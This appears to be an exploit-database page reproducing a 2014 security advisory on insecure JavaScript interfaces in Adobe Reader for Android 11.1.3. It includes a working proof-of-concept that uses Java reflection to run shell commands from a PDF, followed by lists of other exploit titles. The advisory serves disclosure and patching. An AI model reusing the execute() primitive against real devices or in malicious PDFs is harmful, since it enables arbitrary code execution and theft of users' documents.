Menu

Search for hundreds of thousands of exploits

"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution"

Author

Exploit author

"Yorick Koster"

Platform

Exploit platform

android

Release date

Exploit published date

2014-04-15

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
------------------------------------------------------------------------
Adobe Reader for Android exposes insecure Javascript interfaces
------------------------------------------------------------------------
Yorick Koster, April 2014

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Adobe Reader for Android [2] exposes several insecure Javascript
interfaces. This issue can be exploited by opening a malicious PDF in
Adobe Reader. Exploiting this issue allows for the execution of
arbitrary Java code, which can result in a compromise of the documents
stored in Reader and files stored on SD card.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Adobe Reader for Android
version 11.1.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Adobe released version 11.2.0 of Adobe Reader that add
@JavascriptInterface [3] annotations to public methods that should be
exposed in the Javascript interfaces. In addition, the app now targets
API Level 17 and contains a static method
(shouldInitializeJavaScript()) that is used to check the device's
Android version.

http://www.securify.nl/advisory/SFY20140401/reader_11.2.0_release_notes.png
Figure 1: Adobe Reader for Android 11.2.0 release notes

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Adobe Reader for Android allows users to work with PDF documents on an
Android tablet or phone. According to Google Play, the app is installed
on 100 million to 500 million devices.

The following classes expose one or more Javascript interfaces:

- ARJavaScript
- ARCloudPrintActivity
- ARCreatePDFWebView

The app targets API Level 10, which renders the exposed Javascript
interfaces vulnerable to code execution - provided that an attacker
manages to run malicious Javascript code within Adobe Reader.

------------------------------------------------------------------------
PDF Javascript APIs
------------------------------------------------------------------------
It appears that Adobe Reader for Mobile supports [4] a subset of the
Javascript for Acrobat APIs. For some reason the exposed Javscript
objects are prefixed with an underscore character.

public class ARJavaScript
{
[...]

     public ARJavaScript(ARViewerActivity paramARViewerActivity)
     {
[...]
         this.mWebView.addJavascriptInterface(new 
ARJavaScriptInterface(this),
"_adobereader");
         this.mWebView.addJavascriptInterface(new
ARJavaScriptApp(this.mContext), "_app");
         this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(), 
"_doc");
         this.mWebView.addJavascriptInterface(new
ARJavaScriptEScriptString(this.mContext), "_escriptString");
         this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(),
"_event");
         this.mWebView.addJavascriptInterface(new ARJavaScriptField(),
"_field");
         this.mWebView.setWebViewClient(new ARJavaScript.1(this));
this.mWebView.loadUrl("file:///android_asset/javascript/index.html");
     }

An attacker can create a specially crafted PDF file containing
Javascript that runs when the target user views (or interacts with)
this PDF file. Using any of the Javascript objects listed above
provides the attacker access to the public Reflection APIs inherited
from Object. These APIs can be abused to run arbitrary Java code.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept [5] will create a text file in the app
sandbox.

function execute(bridge, cmd) {
     return bridge.getClass().forName('java.lang.Runtime')
         .getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}

if(window._app) {
     try {
         var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
         execute(window._app, ['/system/bin/sh','-c','echo \"Lorem 
ipsum\" > '
+ path]);
         window._app.alert(path + ' created', 3);
     } catch(e) {
         window._app.alert(e, 0);
     }
}
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] 
http://www.securify.nl/advisory/SFY20140401/adobe_reader_for_android_exposes_insecure_javascript_interfaces.html
[2] https://play.google.com/store/apps/details?id=com.adobe.reader
[3] 
http://developer.android.com/reference/android/webkit/JavascriptInterface.html
[4] 
http://www.adobe.com/devnet-docs/acrobatetk/tools/Mobile/js.html#supported-javascript-apis
[5] http://www.securify.nl/advisory/SFY20140401/mobilereader.poc.pdf
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-07-02 "WhatsApp Remote Code Execution - Paper" webapps android "ashu Jaiswal"
2020-02-24 "Android Binder - Use-After-Free (Metasploit)" local android Metasploit
2020-01-14 "Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN" dos android "Google Security Research"
2020-01-14 "WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM" dos android "Google Security Research"
2019-11-08 "Android Janus - APK Signature Bypass (Metasploit)" local android Metasploit
2019-10-16 "Whatsapp 2.19.216 - Remote Code Execution" remote android "Valerio Brussani"
2019-10-04 "Android - Binder Driver Use-After-Free" local android "Google Security Research"
2019-08-30 "Canon PRINT 2.5.5 - Information Disclosure" local android 0x48piraj
2019-07-24 "Android 7 < 9 - Remote Code Execution" remote android "Marcin Kozlowski"
2019-07-15 "Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write" dos android "Marcin Kozlowski"
Release Date Title Type Platform Author
2018-08-27 "Seagate Personal Cloud SRN21C 4.3.16.0 / 4.3.18.0 - SQL Injection" webapps hardware "Yorick Koster"
2017-07-26 "Microsoft Windows - '.LNK' Shortcut File Code Execution (Metasploit)" local windows "Yorick Koster"
2017-03-01 "WordPress Plugin Global Content Blocks 2.1.5 - Cross-Site Request Forgery" webapps php "Yorick Koster"
2016-08-22 "WordPress 4.5.3 - Directory Traversal / Denial of Service" webapps php "Yorick Koster"
2016-08-01 "WordPress Plugin ALO EasyMail NewsLetter 2.9.2 - Cross-Site Request Forgery (Add/Import Arbitrary Subscribers)" webapps php "Yorick Koster"
2015-09-23 "Cisco AnyConnect 3.1.08009 - Local Privilege Escalation (via DMG Install Script)" local osx "Yorick Koster"
2014-04-15 "Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution" local android "Yorick Koster" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected